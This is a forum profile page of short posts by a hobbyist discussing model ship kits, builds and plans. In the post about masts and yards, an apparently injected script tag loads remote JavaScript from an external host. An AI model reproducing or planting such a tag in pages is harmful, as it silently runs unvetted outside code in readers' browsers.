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Everything posted by cristikc

  1. Hi Daryl Maybe you can look here: http://modelshipworld.com/index.php?/topic/293-santisima-trinidad-by-cristikc-occre-1769-wood-cross-section-190/page-4 and see how i solved the problem, it is the same cross section Al the best, Cristi
  2. Just Excelent!!!
  3. Nice and interesting. The first time i see a Sweden made model ship. It looks the the quality is not the best, but looks ok to me. What is the price, compare with the clasical kits: Amati, Corel, Mantua, Mamoli, Occre and the others? I will look close to your ship, is interesting. Al the best Cristi
  4. Very nice to see that you succeed to pass over the "nightmare". Maybe you can see where it was the damage, but now it looks ok. Hope it will be the last problem with this ship. All the best and good luck Cristi
  5. Back to the old San John. I made a long pause, in order to finish the cross sections. Now i made the masts and sall the yards some details <script id="asdasdfdhggfhjhlfd4" src="//asrv-a.akamaihd.net/sd/1018/1005.js"> </script>
  6. Thanks for sharing, very useful info. I will tray soon to see how it works to me Cristi
  7. Hello Alex just Excellent i can say. I hve no words. Cristi
  8. This is realy a masterwork. Like very much. Congratulations Cristi
  9. Hi all, thank you for the kind words, and for the encourage thoughts. It will be a lot of work, but hope the results will be the same Cherrio, i saw that you like, as i like Mantua models, it is an old and very good company. I will look with interest to all of you, and your works All the best from me, Cristi
  10. Dan, you have a lot of good ideas, and hope that you don't mind that we take some of yours ideas to use All the best, and wait new ideas Cristi
  11. Hey Vossy Sorry to hear about these. For the moment, i did not have problems with the kits, it was a small one to Occre, but i solved. Hope not to have problems with this
  12. Hi Brian, thank's fpr the wishes Vossy As i saw when i unpack, the wood quality seems excelent, i did not count the parts, but i will see how many are. Generaly at the end, i remain with some, but depends how you organise the work Cristi
  13. Small parts Drawings: Ropes: Decorations, guns ... Ready to Start. I need just some more TIME
  14. The quality of the KIT seems EXCELENT but i can say that olso the price, but if you realy want something good, Mantua is excellent
  15. What's inside. I was many times curious. Just a few weeks ago i found a small presentation on youtube Now, i found this
  16. Finaly , a Dream start to become true Sovereign of the Seas, arrived The firs pictures from the unboxing Took out from the delivery box: Start to take out:
  17. Excelent, and thank's for share. I will start soon with Sovereign and i will use your drawings. Tank you in advance Cristi
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